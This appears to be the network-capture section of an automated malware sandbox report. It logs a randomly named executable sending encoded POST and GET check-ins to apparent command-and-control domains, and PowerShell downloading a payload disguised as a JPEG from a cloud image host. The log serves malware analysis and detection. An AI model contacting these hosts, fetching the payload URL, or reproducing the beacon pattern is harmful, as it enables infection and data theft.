                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Dec 4, 2024 13:09:38.120176077 CET | 1008 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Wed, 04 Dec 2024 12:09:37 GMT
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=742%2BUAINZjpdBsEaKOwC38Krv1ju7ChPcM%2FbqPxqYltx0Pl2MPNqZnPUS7JTm13qVyagMZorfFpJXpP4Y3FzWAvTeSKPHrDtvjEBMTzzTYcmZQxxX6QhwSES2LGX30oY%2FR7SjZuNKL3B"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ecbb049f9b38c7d-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1978&min_rtt=1978&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 37 32 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /r72u/ was not found on this server.</p></body></html>0


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      3 | 192.168.2.8 | 49764 | 172.67.128.109 | 80 | 60 | C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Dec 4, 2024 13:09:53.653451920 CET | 751 | OUT | POST /wl1d/ HTTP/1.1
                                                                                                      Host: www.cifasnc.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 206
                                                                                                      Origin: http://www.cifasnc.info
                                                                                                      Referer: http://www.cifasnc.info/wl1d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Data Ascii: CJE8V=at83EVwBksHFP48JwIHQmN4S32wqL8i3beh/5Vfptm+cqszUASRQ8QWPU0kRPYE9Q/h/T9zizXuAEnmwtlDNcNbKxQjppElIUBDiqNjRiHrGvlfQ56xok+7kG5jqU2/N56wPkCKWevKZhFQYOiYflW1Kri91t37Trnu/9zlO6p4Fu13PMI2cMibc4NBeDdqkqmO4XLM=
Dec 4, 2024 13:09:54.892039061 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Wed, 04 Dec 2024 12:09:54 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      last-modified: Wed, 04 Dec 2024 12:09:54 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      vary: Accept-Encoding,User-Agent
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SDegcyNPwz2ldTWYw8mBg1LChIHHwPUCoxwu31J22yKj59akTIGXZzJAbUOEER41dCLBaPAsqHwN2YHAv3j7qqgMeNbYAfPO%2FChkf3QAMvsve9TtxSen7N0nbwyqrBbtNwRv"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ecbb0b4486ec342-EWR
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1526&rtt_var=763&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data: [gzip-compressed response body, binary dump omitted]
Dec 4, 2024 13:09:54.892244101 CET | 1153 | IN | Data: [gzip-compressed response body, continued]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49771 | 172.67.128.109 | 80 | 60 | C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 13:09:56.318219900 CET | 771 | OUT | POST /wl1d/ HTTP/1.1
                                                                                                      Host: www.cifasnc.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 226
                                                                                                      Origin: http://www.cifasnc.info
                                                                                                      Referer: http://www.cifasnc.info/wl1d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Data Ascii: CJE8V=at83EVwBksHFPYsJj/zQx94V5Wwqesirbel/5RG0sTmcqNjUBWlQ7QWPcUkQSoEjQ4pNT/XizXqAEiCwtWrOadbI8wjntElIUBDiqLP7iHzGvUvQ5bxvse7lPZjqDm/J56whkDX9etyZhA8YOzYQ+G1MlC9mpCW+yF6b1z180poQijGlWq+aPiz34OpoGq3MwFeIJcaQ3yLtI8ICT/SCnvTj9Cqt
Dec 4, 2024 13:09:57.553250074 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Wed, 04 Dec 2024 12:09:57 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      last-modified: Wed, 04 Dec 2024 12:09:57 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      vary: Accept-Encoding,User-Agent
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wswr4lfsK7wYm1A%2BeG5PG0E9oWtyUFDue%2FOaVZV3AbXUHy9KfC35pTCP2Vc3aaTmhSAmMg2d1zJaBNjjQnQgyPkuC8UitQtnSg%2B14Qj8Tcr5ChsVW8ycqFDwTmPnUcraw4KG"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ecbb0c4fc367c82-EWR
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1908&min_rtt=1908&rtt_var=954&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data: [gzip-compressed response body, binary dump omitted]
Dec 4, 2024 13:09:57.553406000 CET | 1157 | IN | Data: [gzip-compressed response body, continued]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49777 | 172.67.128.109 | 80 | 60 | C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 13:09:59.019768000 CET | 1788 | OUT | POST /wl1d/ HTTP/1.1
                                                                                                      Host: www.cifasnc.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1242
                                                                                                      Origin: http://www.cifasnc.info
                                                                                                      Referer: http://www.cifasnc.info/wl1d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
Data Ascii: CJE8V= [TRUNCATED]
Dec 4, 2024 13:10:00.253221989 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Wed, 04 Dec 2024 12:10:00 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      last-modified: Wed, 04 Dec 2024 12:10:00 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      vary: Accept-Encoding,User-Agent
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I2EAyYF26HOQOXyLZrJaXL%2BO0itnYrPq0Pm8olJjXXIBWaGdnjFau%2BtdSo48j%2B4BXqKYiU%2B9Ukd2ueXNJd0lq2J3dggC4o1b53gE%2B8NPIwrrsgqdp3kcr8djVmMOJ6iqstFV"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ecbb0d58bf6efa3-EWR
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1959&rtt_var=979&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1788&delivery_rate=0&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data: [gzip-compressed response body, binary dump omitted]
Dec 4, 2024 13:10:00.253374100 CET | 1167 | IN | Data: [gzip-compressed response body, continued]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49783 | 172.67.128.109 | 80 | 60 | C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 13:10:01.782880068 CET | 489 | OUT | GET /wl1d/?CJE8V=XvUXHicd9bu/Gt5jzcf/yfRZ+nBfc8WBaOJ84C+StjmOhsjVLRYh1E2iBn46Z6pXP/d+KNfO4kCSPH2wqnfuXKL7xm74uEd7QDGj+trIsQHnhWbGvacQ1+C6F6CbLlCz6w==&-DiH=2XvD5 HTTP/1.1
                                                                                                      Host: www.cifasnc.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
Dec 4, 2024 13:10:02.988033056 CET | 1234 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                      Date: Wed, 04 Dec 2024 12:10:02 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      last-modified: Wed, 04 Dec 2024 12:10:02 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      location: http://cifasnc.info/wl1d/?CJE8V=XvUXHicd9bu/Gt5jzcf/yfRZ+nBfc8WBaOJ84C+StjmOhsjVLRYh1E2iBn46Z6pXP/d+KNfO4kCSPH2wqnfuXKL7xm74uEd7QDGj+trIsQHnhWbGvacQ1+C6F6CbLlCz6w==&-DiH=2XvD5
                                                                                                      vary: User-Agent
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8wJgWEUgKpLsXwXtyKSI%2FXDpO6BvKQIsIe5GxPk%2BCo8avLK9SUwDlNUflQxJyPgLLCiSmAxyxU7UcwlIFLZbJENrE9hJay4tBrC5xrKGNxMpclBF%2BkTeAhDqZhz%2B4FfYLR%2Fi"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ecbb0e69e37c427-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1591&rtt_var=795&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=489&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49800 | 199.59.243.227 | 80 | 60 | C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 13:10:09.077312946 CET | 742 | OUT | POST /9p84/ HTTP/1.1
                                                                                                      Host: www.sql.dance
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 206
                                                                                                      Origin: http://www.sql.dance
                                                                                                      Referer: http://www.sql.dance/9p84/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Data Ascii: CJE8V=hXDnZuGhtKZOxaIIL5+q6e7HS7Gn93e/3iMFw2FxmOTkE2ziOCnxCLX8esTqXB7pqdeR+0pjctBtTt72jdluINgoO7cMLxO4uON4OnOQtCTdG/IIAANUt8+lrVb0GCUB6N95f2KTye8rzVx32cjPOeHle4CLzdRINBltcLMwVXeGGcCcytGKrqoDRs5cci0bp9pdukM=
Dec 4, 2024 13:10:10.198760033 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                      date: Wed, 04 Dec 2024 12:10:09 GMT
                                                                                                      content-type: text/html; charset=utf-8
                                                                                                      content-length: 1102
                                                                                                      x-request-id: 92b19abf-4f76-4359-908d-73fc21cbfb1e
                                                                                                      cache-control: no-store, max-age=0
                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KW7KGAbhVYKpfk9+4Y7JKvZeDxWQ9VyfyZs49bTZ0NYrGOIQxJQYyT9QIaQCzy6UESVEacWJcjfeuo/K5qZlyA==
                                                                                                      set-cookie: parking_session=92b19abf-4f76-4359-908d-73fc21cbfb1e; expires=Wed, 04 Dec 2024 12:25:10 GMT; path=/
                                                                                                      connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      8 | 192.168.2.8 | 49810 | 199.59.243.227 | 80 | 60 | C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Dec 4, 2024 13:10:11.738704920 CET | 762 | OUT
                                                                                                      POST /9p84/ HTTP/1.1
                                                                                                      Host: www.sql.dance
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 226
                                                                                                      Origin: http://www.sql.dance
                                                                                                      Referer: http://www.sql.dance/9p84/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Dec 4, 2024 13:10:12.872740030 CET | 1236 | IN
                                                                                                      HTTP/1.1 200 OK
                                                                                                      date: Wed, 04 Dec 2024 12:10:12 GMT
                                                                                                      content-type: text/html; charset=utf-8
                                                                                                      content-length: 1102
                                                                                                      x-request-id: 320d044e-23f4-4406-99db-a375660147b3
                                                                                                      cache-control: no-store, max-age=0
                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KW7KGAbhVYKpfk9+4Y7JKvZeDxWQ9VyfyZs49bTZ0NYrGOIQxJQYyT9QIaQCzy6UESVEacWJcjfeuo/K5qZlyA==
                                                                                                      set-cookie: parking_session=320d044e-23f4-4406-99db-a375660147b3; expires=Wed, 04 Dec 2024 12:25:12 GMT; path=/
                                                                                                      connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      9 | 192.168.2.8 | 49816 | 199.59.243.227 | 80 | 60 | C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Dec 4, 2024 13:10:14.394915104 CET | 1779 | OUT
                                                                                                      POST /9p84/ HTTP/1.1
                                                                                                      Host: www.sql.dance
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1242
                                                                                                      Origin: http://www.sql.dance
                                                                                                      Referer: http://www.sql.dance/9p84/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Dec 4, 2024 13:10:15.528443098 CET | 1236 | IN
                                                                                                      HTTP/1.1 200 OK
                                                                                                      date: Wed, 04 Dec 2024 12:10:15 GMT
                                                                                                      content-type: text/html; charset=utf-8
                                                                                                      content-length: 1102
                                                                                                      x-request-id: 596439ea-82e1-46d3-b792-21bcbd0e3891
                                                                                                      cache-control: no-store, max-age=0
                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KW7KGAbhVYKpfk9+4Y7JKvZeDxWQ9VyfyZs49bTZ0NYrGOIQxJQYyT9QIaQCzy6UESVEacWJcjfeuo/K5qZlyA==
                                                                                                      set-cookie: parking_session=596439ea-82e1-46d3-b792-21bcbd0e3891; expires=Wed, 04 Dec 2024 12:25:15 GMT; path=/
                                                                                                      connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      10 | 192.168.2.8 | 49822 | 199.59.243.227 | 80 | 60 | C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Dec 4, 2024 13:10:17.045541048 CET | 486 | OUT
                                                                                                      GET /9p84/?CJE8V=sVrHaezIocwvk586NbKL/ZmiafOvpGHuxCd8uk51gcnLQEXEQAeULabxZfXafDaZqd/22GpcW/h9erqwiYl6Kq4oLeU8CyaDpPEVNRKQpnjvGs8eQi8Qsuigmn/6Gj17jw==&-DiH=2XvD5 HTTP/1.1
                                                                                                      Host: www.sql.dance
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Dec 4, 2024 13:10:18.203358889 CET | 1236 | IN
                                                                                                      HTTP/1.1 200 OK
                                                                                                      date: Wed, 04 Dec 2024 12:10:17 GMT
                                                                                                      content-type: text/html; charset=utf-8
                                                                                                      content-length: 1478
                                                                                                      x-request-id: c39dfbed-d988-4c9a-9a8b-931f10f72cd7
                                                                                                      cache-control: no-store, max-age=0
                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DfII99sitP5HyQA1+f3m6ApYylUHNYgBvU4Ts9KMdu48k2rFmhbHzU+Lpy9sDNonjmBgyn+BFMO2v4dUy2hjHA==
                                                                                                      set-cookie: parking_session=c39dfbed-d988-4c9a-9a8b-931f10f72cd7; expires=Wed, 04 Dec 2024 12:25:18 GMT; path=/
                                                                                                      connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      0 | 192.168.2.8 | 49705 | 151.101.129.137 | 443 | 6364 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2024-12-04 12:08:26 UTC | 127 | OUT
                                                                                                      GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                                                      Host: res.cloudinary.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-04 12:08:27 UTC | 804 | IN
                                                                                                      HTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      Content-Length: 2230233
                                                                                                      Content-Type: image/jpeg
                                                                                                      Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                                                      Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                                                      Date: Wed, 04 Dec 2024 12:08:27 GMT
                                                                                                      Strict-Transport-Security: max-age=604800
                                                                                                      Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                                      Server-Timing: cld-fastly;dur=325;cpu=91;start=2024-12-04T12:08:26.913Z;desc=miss,rtt;dur=170,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)",cloudinary;dur=222;start=2024-12-04T12:08:27.007Z
                                                                                                      Server: Cloudinary
                                                                                                      Timing-Allow-Origin: *
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Accept-Ranges: bytes
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                                      x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                                                      Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                      Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
